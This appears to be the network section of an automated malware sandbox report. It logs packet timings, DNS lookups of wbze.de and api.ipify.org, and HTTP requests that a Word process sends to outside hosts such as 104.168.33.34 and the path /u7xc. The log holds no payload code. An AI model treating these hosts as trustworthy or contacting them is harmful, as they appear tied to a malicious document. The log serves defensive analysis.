                                                    May 6, 2024 14:59:20.679044962 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.679059029 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.679065943 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.679073095 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.679080963 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.679105043 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.679117918 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.679131985 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.679160118 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.681363106 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826370955 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826400042 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826423883 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826445103 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826457024 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826468945 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826482058 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826494932 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826508999 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826522112 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826535940 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826549053 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826565027 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826580048 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826596022 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826608896 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826615095 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826615095 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826615095 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826615095 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826615095 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826615095 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826615095 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826615095 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826622009 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826636076 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826649904 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826649904 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826649904 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826649904 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826649904 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826649904 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826652050 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826663017 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826663017 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826667070 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826674938 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826678991 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826690912 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826692104 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826706886 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826714993 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826714993 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826721907 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826728106 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826736927 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826746941 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826750040 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826759100 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826762915 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826771975 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826776981 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826786041 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826788902 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826797009 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826803923 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826809883 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826817036 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826823950 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826834917 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826839924 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826848984 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826853037 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826862097 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826869965 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826874971 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826883078 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826888084 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826900005 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826900959 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826913118 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826917887 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826924086 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826932907 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826941013 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826945066 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826955080 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826957941 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826961994 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826973915 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826981068 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.826988935 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.826988935 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827001095 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827008009 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827017069 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827023029 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827034950 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827039003 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827049971 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827064991 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827073097 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827073097 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827078104 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827085972 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827099085 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827100992 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827110052 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827114105 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827130079 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827135086 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827143908 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827152014 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827157021 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827164888 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827168941 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827178955 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827182055 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827194929 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827197075 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827208042 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827209949 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827223063 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827229977 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827238083 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827239037 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827254057 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827260017 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827269077 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827275991 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827282906 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827291012 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827303886 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827303886 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827315092 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827317953 CEST8049172104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:20.827333927 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.827347994 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:20.829598904 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:21.833046913 CEST8049168109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:21.833100080 CEST4916880192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:22.919693947 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:22.919776917 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:23.326946974 CEST4917280192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:29.044585943 CEST49173443192.168.2.22104.26.13.205
                                                    May 6, 2024 14:59:29.044629097 CEST44349173104.26.13.205192.168.2.22
                                                    May 6, 2024 14:59:29.044694901 CEST49173443192.168.2.22104.26.13.205
                                                    May 6, 2024 14:59:29.049902916 CEST49173443192.168.2.22104.26.13.205
                                                    May 6, 2024 14:59:29.049918890 CEST44349173104.26.13.205192.168.2.22
                                                    May 6, 2024 14:59:29.281883001 CEST44349173104.26.13.205192.168.2.22
                                                    May 6, 2024 14:59:29.281996965 CEST49173443192.168.2.22104.26.13.205
                                                    May 6, 2024 14:59:29.335850954 CEST49173443192.168.2.22104.26.13.205
                                                    May 6, 2024 14:59:29.335881948 CEST44349173104.26.13.205192.168.2.22
                                                    May 6, 2024 14:59:29.336263895 CEST44349173104.26.13.205192.168.2.22
                                                    May 6, 2024 14:59:29.454785109 CEST49173443192.168.2.22104.26.13.205
                                                    May 6, 2024 14:59:29.496128082 CEST44349173104.26.13.205192.168.2.22
                                                    May 6, 2024 14:59:29.635756969 CEST44349173104.26.13.205192.168.2.22
                                                    May 6, 2024 14:59:29.635824919 CEST44349173104.26.13.205192.168.2.22
                                                    May 6, 2024 14:59:29.635885954 CEST49173443192.168.2.22104.26.13.205
                                                    May 6, 2024 14:59:29.660428047 CEST49173443192.168.2.22104.26.13.205
                                                    May 6, 2024 14:59:41.248682976 CEST49174443192.168.2.22172.67.74.152
                                                    May 6, 2024 14:59:41.248729944 CEST44349174172.67.74.152192.168.2.22
                                                    May 6, 2024 14:59:41.248815060 CEST49174443192.168.2.22172.67.74.152
                                                    May 6, 2024 14:59:41.251981974 CEST49174443192.168.2.22172.67.74.152
                                                    May 6, 2024 14:59:41.251996994 CEST44349174172.67.74.152192.168.2.22
                                                    May 6, 2024 14:59:41.482078075 CEST44349174172.67.74.152192.168.2.22
                                                    May 6, 2024 14:59:41.482193947 CEST49174443192.168.2.22172.67.74.152
                                                    May 6, 2024 14:59:41.491679907 CEST49174443192.168.2.22172.67.74.152
                                                    May 6, 2024 14:59:41.491692066 CEST44349174172.67.74.152192.168.2.22
                                                    May 6, 2024 14:59:41.492242098 CEST44349174172.67.74.152192.168.2.22
                                                    May 6, 2024 14:59:41.626360893 CEST49174443192.168.2.22172.67.74.152
                                                    May 6, 2024 14:59:41.672115088 CEST44349174172.67.74.152192.168.2.22
                                                    May 6, 2024 14:59:41.809967995 CEST44349174172.67.74.152192.168.2.22
                                                    May 6, 2024 14:59:41.810039043 CEST44349174172.67.74.152192.168.2.22
                                                    May 6, 2024 14:59:41.810167074 CEST49174443192.168.2.22172.67.74.152
                                                    May 6, 2024 14:59:41.826927900 CEST49174443192.168.2.22172.67.74.152
                                                    May 6, 2024 15:01:02.112514019 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 15:01:02.112591028 CEST4916880192.168.2.22109.71.253.25
                                                    May 6, 2024 15:01:02.596457005 CEST4916880192.168.2.22109.71.253.25
                                                    May 6, 2024 15:01:02.656475067 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 15:01:03.356487989 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 15:01:03.576503992 CEST4916880192.168.2.22109.71.253.25
                                                    May 6, 2024 15:01:04.756583929 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 15:01:05.536657095 CEST4916880192.168.2.22109.71.253.25
                                                    May 6, 2024 15:01:07.556755066 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 15:01:09.456835985 CEST4916880192.168.2.22109.71.253.25
                                                    May 6, 2024 15:01:13.157069921 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 15:01:17.297302008 CEST4916880192.168.2.22109.71.253.25
                                                    May 6, 2024 15:01:24.367724895 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 15:01:32.980218887 CEST4916880192.168.2.22109.71.253.25
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    May 6, 2024 14:59:02.018354893 CEST138138192.168.2.22192.168.2.255
                                                    May 6, 2024 14:59:03.905026913 CEST5456253192.168.2.228.8.8.8
                                                    May 6, 2024 14:59:04.162538052 CEST53545628.8.8.8192.168.2.22
                                                    May 6, 2024 14:59:04.991640091 CEST5291753192.168.2.228.8.8.8
                                                    May 6, 2024 14:59:05.244090080 CEST53529178.8.8.8192.168.2.22
                                                    May 6, 2024 14:59:05.248773098 CEST6275153192.168.2.228.8.8.8
                                                    May 6, 2024 14:59:05.370099068 CEST53627518.8.8.8192.168.2.22
                                                    May 6, 2024 14:59:10.131675005 CEST5789353192.168.2.228.8.8.8
                                                    May 6, 2024 14:59:10.376619101 CEST53578938.8.8.8192.168.2.22
                                                    May 6, 2024 14:59:10.401655912 CEST5482153192.168.2.228.8.8.8
                                                    May 6, 2024 14:59:10.523901939 CEST53548218.8.8.8192.168.2.22
                                                    May 6, 2024 14:59:12.243469000 CEST5471953192.168.2.228.8.8.8
                                                    May 6, 2024 14:59:12.378055096 CEST53547198.8.8.8192.168.2.22
                                                    May 6, 2024 14:59:12.379580975 CEST4988153192.168.2.228.8.8.8
                                                    May 6, 2024 14:59:12.501507998 CEST53498818.8.8.8192.168.2.22
                                                    May 6, 2024 14:59:28.754096031 CEST5499853192.168.2.228.8.8.8
                                                    May 6, 2024 14:59:28.899468899 CEST53549988.8.8.8192.168.2.22
                                                    May 6, 2024 14:59:28.899776936 CEST5499853192.168.2.228.8.8.8
                                                    May 6, 2024 14:59:29.036623001 CEST53549988.8.8.8192.168.2.22
                                                    May 6, 2024 14:59:30.344197035 CEST137137192.168.2.22192.168.2.255
                                                    May 6, 2024 14:59:31.095282078 CEST137137192.168.2.22192.168.2.255
                                                    May 6, 2024 14:59:31.859740019 CEST137137192.168.2.22192.168.2.255
                                                    May 6, 2024 14:59:41.088793993 CEST5278153192.168.2.228.8.8.8
                                                    May 6, 2024 14:59:41.238677025 CEST53527818.8.8.8192.168.2.22
                                                    May 6, 2024 14:59:58.782798052 CEST6392653192.168.2.228.8.8.8
                                                    May 6, 2024 14:59:58.926302910 CEST53639268.8.8.8192.168.2.22
                                                    May 6, 2024 14:59:59.744451046 CEST137137192.168.2.22192.168.2.255
                                                    May 6, 2024 15:00:00.493834972 CEST137137192.168.2.22192.168.2.255
                                                    May 6, 2024 15:00:01.243910074 CEST137137192.168.2.22192.168.2.255
                                                    May 6, 2024 15:00:08.689721107 CEST137137192.168.2.22192.168.2.255
                                                    May 6, 2024 15:00:09.439368963 CEST137137192.168.2.22192.168.2.255
                                                    May 6, 2024 15:00:10.189399004 CEST137137192.168.2.22192.168.2.255
                                                    May 6, 2024 15:00:12.425851107 CEST137137192.168.2.22192.168.2.255
                                                    May 6, 2024 15:00:13.175597906 CEST137137192.168.2.22192.168.2.255
                                                    May 6, 2024 15:00:13.925676107 CEST137137192.168.2.22192.168.2.255
                                                    May 6, 2024 15:01:01.705715895 CEST138138192.168.2.22192.168.2.255
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    May 6, 2024 14:59:03.905026913 CEST192.168.2.228.8.8.80x691cStandard query (0)wbze.deA (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:04.991640091 CEST192.168.2.228.8.8.80xef9dStandard query (0)wbze.deA (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:05.248773098 CEST192.168.2.228.8.8.80x78bfStandard query (0)wbze.deA (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:10.131675005 CEST192.168.2.228.8.8.80xc083Standard query (0)wbze.deA (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:10.401655912 CEST192.168.2.228.8.8.80x1100Standard query (0)wbze.deA (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:12.243469000 CEST192.168.2.228.8.8.80xb6ecStandard query (0)wbze.deA (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:12.379580975 CEST192.168.2.228.8.8.80xd97eStandard query (0)wbze.deA (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:28.754096031 CEST192.168.2.228.8.8.80x37baStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:28.899776936 CEST192.168.2.228.8.8.80x37baStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:41.088793993 CEST192.168.2.228.8.8.80x375cStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:58.782798052 CEST192.168.2.228.8.8.80xf5cbStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    May 6, 2024 14:59:04.162538052 CEST8.8.8.8192.168.2.220x691cNo error (0)wbze.de109.71.253.25A (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:05.244090080 CEST8.8.8.8192.168.2.220xef9dNo error (0)wbze.de109.71.253.25A (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:05.370099068 CEST8.8.8.8192.168.2.220x78bfNo error (0)wbze.de109.71.253.25A (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:10.376619101 CEST8.8.8.8192.168.2.220xc083No error (0)wbze.de109.71.253.25A (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:10.523901939 CEST8.8.8.8192.168.2.220x1100No error (0)wbze.de109.71.253.25A (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:12.378055096 CEST8.8.8.8192.168.2.220xb6ecNo error (0)wbze.de109.71.253.25A (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:12.501507998 CEST8.8.8.8192.168.2.220xd97eNo error (0)wbze.de109.71.253.25A (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:28.899468899 CEST8.8.8.8192.168.2.220x37baNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:28.899468899 CEST8.8.8.8192.168.2.220x37baNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:28.899468899 CEST8.8.8.8192.168.2.220x37baNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:29.036623001 CEST8.8.8.8192.168.2.220x37baNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:29.036623001 CEST8.8.8.8192.168.2.220x37baNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:29.036623001 CEST8.8.8.8192.168.2.220x37baNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:41.238677025 CEST8.8.8.8192.168.2.220x375cNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:41.238677025 CEST8.8.8.8192.168.2.220x375cNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:41.238677025 CEST8.8.8.8192.168.2.220x375cNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:58.926302910 CEST8.8.8.8192.168.2.220xf5cbNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:58.926302910 CEST8.8.8.8192.168.2.220xf5cbNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                    May 6, 2024 14:59:58.926302910 CEST8.8.8.8192.168.2.220xf5cbNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                    • wbze.de
                                                    • api.ipify.org
                                                    • 104.168.33.34
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.2249161109.71.253.25801516C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    TimestampBytes transferredDirectionData
                                                    May 6, 2024 14:59:04.385014057 CEST129OUTOPTIONS / HTTP/1.1
                                                    User-Agent: Microsoft Office Protocol Discovery
                                                    Host: wbze.de
                                                    Content-Length: 0
                                                    Connection: Keep-Alive
                                                    May 6, 2024 14:59:04.601027966 CEST550INHTTP/1.1 301 Moved Permanently
                                                    Date: Mon, 06 May 2024 12:59:04 GMT
                                                    Server: Apache/2.4.38 (Debian)
                                                    Location: https://wbze.de/
                                                    Content-Length: 297
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 62 7a 65 2e 64 65 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 62 7a 65 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://wbze.de/">here</a>.</p><hr><address>Apache/2.4.38 (Debian) Server at wbze.de Port 80</address></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.2249162109.71.253.25801516C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    TimestampBytes transferredDirectionData
                                                    May 6, 2024 14:59:05.596797943 CEST112OUTHEAD /u7xc HTTP/1.1
                                                    Connection: Keep-Alive
                                                    User-Agent: Microsoft Office Existence Discovery
                                                    Host: wbze.de
                                                    May 6, 2024 14:59:05.815908909 CEST236INHTTP/1.1 301 Moved Permanently
                                                    Date: Mon, 06 May 2024 12:59:05 GMT
                                                    Server: Apache/2.4.38 (Debian)
                                                    Location: https://wbze.de/u7xc
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: text/html; charset=iso-8859-1


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    2192.168.2.2249164109.71.253.2580
                                                    TimestampBytes transferredDirectionData
                                                    May 6, 2024 14:59:10.745825052 CEST124OUTOPTIONS / HTTP/1.1
                                                    Connection: Keep-Alive
                                                    User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                    translate: f
                                                    Host: wbze.de
                                                    May 6, 2024 14:59:10.964819908 CEST550INHTTP/1.1 301 Moved Permanently
                                                    Date: Mon, 06 May 2024 12:59:10 GMT
                                                    Server: Apache/2.4.38 (Debian)
                                                    Location: https://wbze.de/
                                                    Content-Length: 297
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 62 7a 65 2e 64 65 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 62 7a 65 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
